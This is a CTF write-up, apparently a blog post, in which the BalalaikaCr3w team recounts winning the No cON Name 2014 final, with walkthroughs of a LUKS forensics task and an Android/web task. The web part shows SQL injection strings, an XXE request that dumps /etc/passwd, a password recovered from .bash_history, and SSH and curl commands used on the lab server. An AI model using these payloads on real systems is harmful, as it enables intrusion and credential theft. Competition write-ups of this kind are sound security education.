No cON Name CTF 2014 Final

    From October 30 to November 1, Barcelona hosted the international conference on information security No cON Name 2014 , during which the final of the Capture The Flag competition was held for the second time . The team of the Innopolis University BalalaikaCr3w took part in this competition and won first place. Under the cut, our story about how it was, a few examples of assignments and thanks to those who helped us in this.


    CTF zone during the final

    What is CTF?


    For those who don’t know what the Capture The Flag competition is . This is a kind of analogue of programming competitions, but here most often you do not have to write your own code, but exploit errors in someone else's. Tasks imitate vulnerabilities encountered in real programs, for example, buffer overflows, “homemade” cryptography, unescaped text insertion in SQL queries, or require actions similar to those used in investigating computer incidents: analyzing logs, searching for deleted files and hidden data . The result of a correctly completed task is a text string - a flag . The received flags are handed over to the organizers of the competition for scoring points to the team.

    Most of these competitions are held online and have free registration. The largest of them also have a final round, where several teams (about 10), who have taken the top lines in the online tour, gather on the organizers ’platform in order to compete with each other for the first place under equal conditions (regardless of time zone).

    A bit of history: "No cON Name CTF 2013"


    Last year, No cON Name CTF was co-organized with Facebook. Despite the rather strange qualifying round, which consisted of only three tasks, the final turned out to be interesting and worthy of attention. The format of the final of last year was somewhat not typical for hacker CTF competitions: there were tasks for the solution of each of which a certain amount of points was given at a time, and there were also neutral services located on the servers of the organizers. When exploiting a vulnerability in one of the services, the team needed to write its name in a specific file on the server. Once in a given period of time, the organizers checking program took the team name from this file and awarded it a certain number of points.


    BalalaikaCr3w team took 3rd place last year

    Qualifying Tour “No cON Name 2014”


    This year, the qualifying stage lasted 24 hours and consisted of 10 tasks, 9 of which we decided in the first hours of the game. We managed to solve the last task called Explicit only 5-6 hours before the end of CTF. Analysis of some tasks of the qualifying stage can be found on our blog .

    Final “No cON Name 2014”


    The final, as you already understood, was held in Barcelona, ​​on the territory of Ramón Llull University . Conditions: 8 hours, 16 tasks. The task price is from 150 to 400 points. One of the tasks is a common interactive service, the “capture” of which brings the team 50 points every 10 minutes.

    Next, we describe a couple of tasks and our approach to solving them. This text was conceived not so much for fans of information security as for people who are interested in what they are doing at such competitions, so we simplified some points by sacrificing detail. For detailed analysis, there are writeups in team blogs.

    HIDDENtation Quest (300 points)


    Assignment: " Dig deep into the file and find the flag ", given a file of about 95 MB in size.

    One of the most enjoyable moments on any CTF is learning something new. This time we needed to understand the LUKS drive encryption format. We quickly find out that the attached file is just such a virtual encrypted disk using the hex editor and Internet search for the string “ LUKs ” ( 4C 55 4B 73 ).



    The regular cryptsetup utility for this disk format refused to work with the file from the job, displaying the message " Device hiddentation is not a valid LUKS device ". From the format description we learn that the correct signature at the beginning of the file should be “ LUKS”( 4C 55 4B 53 ). We fix it, now the file opens, but we do not have the key to the encrypted disk.

    After reading the documentation, we find out that the disk is encrypted with a master key , but this key itself is not given to the user, but is stored in several copies in encrypted form in the disk header. To decrypt each copy of the master key, its own user key is used. There can be up to eight such user keys, according to the number of cells specially allocated for this in the disk header.

    In our case, the cryptsetup utility assured that all eight cells were empty. But carefully looking at the place where the cells are located in the hex editor, you can see that there is some data in one of them:



    The first four bytes of a record with a value of 0x0000DEAD indicate that it is inactive. Replacing them with 0x00AC71F3 activate this entry. Now you need to find the user key for this cell.

    Immediately after the header, in the place where zero bytes are usually added for alignment, there is text with some special characters:



    " Try \ x19 most common passwd in \ x07 \ xDD ", which can be interpreted as: " Try the 25 most popular 2013 passwords . " However, none of the 25 most popular passwords allowed to open the container.

    The next step, unfortunately, turned out to be a game of " guessing game " (the most hated category assignments for all CTF teams). We are lucky that the utilitycryptsetup created the same containers as the containers in the job. Having created the container ourselves, we noticed that the record for the last key in the “ key material offset ” field contains the value 0x0708 , however in the file from the task it is 0x0608 :



    Replacing it with the correct value allows you to open the container with the password “ shadow ”.

    But this is not the whole solution. The decrypted container contained a disk image with three partitions. The help files in the first two sections talked about what to look for in the third. The third section did not contain any files at all. As the organizers later explained to us, at some offset there was an NTFS partition on which the file was located. However, we used the first CTF rule: " strings everywhere ". Among the heap of lines from the file we find one very interesting:

    rot13:APAq986942o809qnn32n6987n7422771n53s59r5n1s02rq700ppr43p5196non749r

    As a result, after applying rot13, we get the flag:
    NCNd986942b809daa32a6987a7422771a53f59e5a1f02ed700cce43c5196aba749e .

    Quest demDROID (400 points)


    Task: given an application for Android in the form of an .apk file.

    There are a lot of articles on the Habr how to decompile such files, so we will not dwell on this. After decompilation, we find out that the application connects to the server 10.210.6.1 on the game subnet and sends the following HTTP request:

    POST / HTTP/1.0
    Content-Type: text/xml
    User-Agent: denDROID 1.0
    Host: 10.210.6.1
    {$username}{$password}

    At this moment, we had two options for exploitation:

    1. SQL injection. Compare two queries (without headers):

    Normal query:
    balalaikaasd

    Answer:
    User balalaika is not found!


    Injection request in login:
    q' OR 'x'='xasd

    Answer:
    Invalid password for user q' OR 'x'='x!


    2. Attack XXE (XML eXternal Entity)

    Request:
    ]>q' OR 1=1 /*&xxe;&xxe;

    Answer:
    Invalid password for user q' OR 1=1 /*root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    # sync:x:4:65534:sync:/bin:/bin/sync
    # games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    # lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    # mail:x:8:8:mail:/var/mail:/bin/sh
    # news:x:9:9:news:/var/spool/news:/bin/sh
    # uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
    messagebus:x:102:103::/var/run/dbus:/bin/false
    ch6:x:1000:1000::/home/ch6:/bin/sh
    !


    Using XXE, we try to sort through various variants of the file name with the flag ( flag , flag.txt , / flag , /flag.txt , etc.), as well as various configuration files (for example, /etc/nginx/nginx.conf ), but we don’t find anything interesting.

    We return to the operation of SQL injection. Using the SUBSTR () function , we select the username and password character by character, as it turned out, the only user in the database. We try to log in under it:

    l3wlzHunt3rmw4h4h4

    Server response:

    Welcome, l3wlzHunt3r!
    Good job! But your flag is in another castle!



    Oh, these trolls.

    Alas, this is not the answer. Sometimes tasks on CTF are arranged in such a way that the seemingly correct way of solving leads to a false result. Honeypot , so to speak.

    There was nothing else in the database, so I had to return to XXE. Looking at the .bash_history file of user ch6 , we saw some suspicious lines:

    ...
    tjG86fKwJ2yZ
    ...
    sudo vim /etc/hosts
    ping Wopr
    sudo vim /etc/hosts
    ping Osiris
    nc Osiris 1135
    nc Osiris 11235
    curl Osiris 11235
    curl Osiris:11235
    ...
    

    It turned out that tjG86fKwJ2yZ is the password for user ch6. Next, the case for small:

    ssh ch6@10.210.6.1
    tjG86fKwJ2yZ
    $ curl Osiris:11235
    NcN_f86c108687fd25eea4f8ba10dd4c9bad8fa70a9f74179caf617364965cb8cb4f
    

    Флаг: NcN_f86c108687fd25eea4f8ba10dd4c9bad8fa70a9f74179caf617364965cb8cb4f

    Хочется отметить, что это не очень обдуманный ход со стороны организаторов, потому что права были выставлены таким образом, что доступ по ssh позволял почистить .bash_history, добавить в authorized_keys свои открытые ключи, а также полностью запретить доступ другим командам.

    Еще примечательно, что хост Osiris (адрес которого можно было узнать через XXE из файла /etc/hosts) не был доступен напрямую с компьютеров команд. Обратится к нему можно было только с сервера 10.210.6.1.

    Тем не менее, задание оказалось непростым и в общем-то интересным, потому что потребовались навыки сразу в двух категориях (reverse + web).

    Хронология


    From the very first minutes, we took the initiative into our own hands, making the first blood :

    The first task we solved was a fairly simple steganography called WireTap .

    By the middle of the day, the tournament hosts, the most experienced Spanish team int3pids, opened an account with their points, capturing the neutral dragons service . The intrigue was growing, because for the captured service int3pids received 50 points every 10 minutes, while simultaneously solving other tasks and getting points for them. A couple of hours later, the Ukrainian dcua team entered the fray, solving a task called vodka , but it was already difficult for them to claim victory: our BalalaikaCr3w team and the int3pids home team were already too far ahead.

    As a result, we managed to stay on the top line of the scorboard until the very end of the competition:

    Teams with a zero score did not appear on the scorboard

    It should be noted that the NcN CTF in Barcelona is only the second year and is not as popular and famous as some other CTF competitions. However, the quality of the event is growing. I would like to wish the No cON Name association not to rest on their laurels, but to continue to move on, prepare even more interesting tasks, attract more sponsors and increase the level and prestige of their conference and CTF.

    Acknowledgments


    The BalalaikaCr3w team thanks the Innopolis University for supporting and organizing our trip to the finals. Innopolis is a new university with a focus on IT and robotics. Starting next year, the opening of the Cyber ​​Security Master's program is planned , and they are actively attracting young professionals in the field of information security.

    Our team is also grateful to the companies Active and ABBYY Language Services for the feasible support of their employees for participating in this event.

    References


    For a discussion of assignments from the No cON Name CTF 2014 finals and other competitions, see our blog: ctfcrew.org
    Information about upcoming CTFs and all events in the CTF world in general on the main resource of all teams: ctftime.org .

    Also popular now: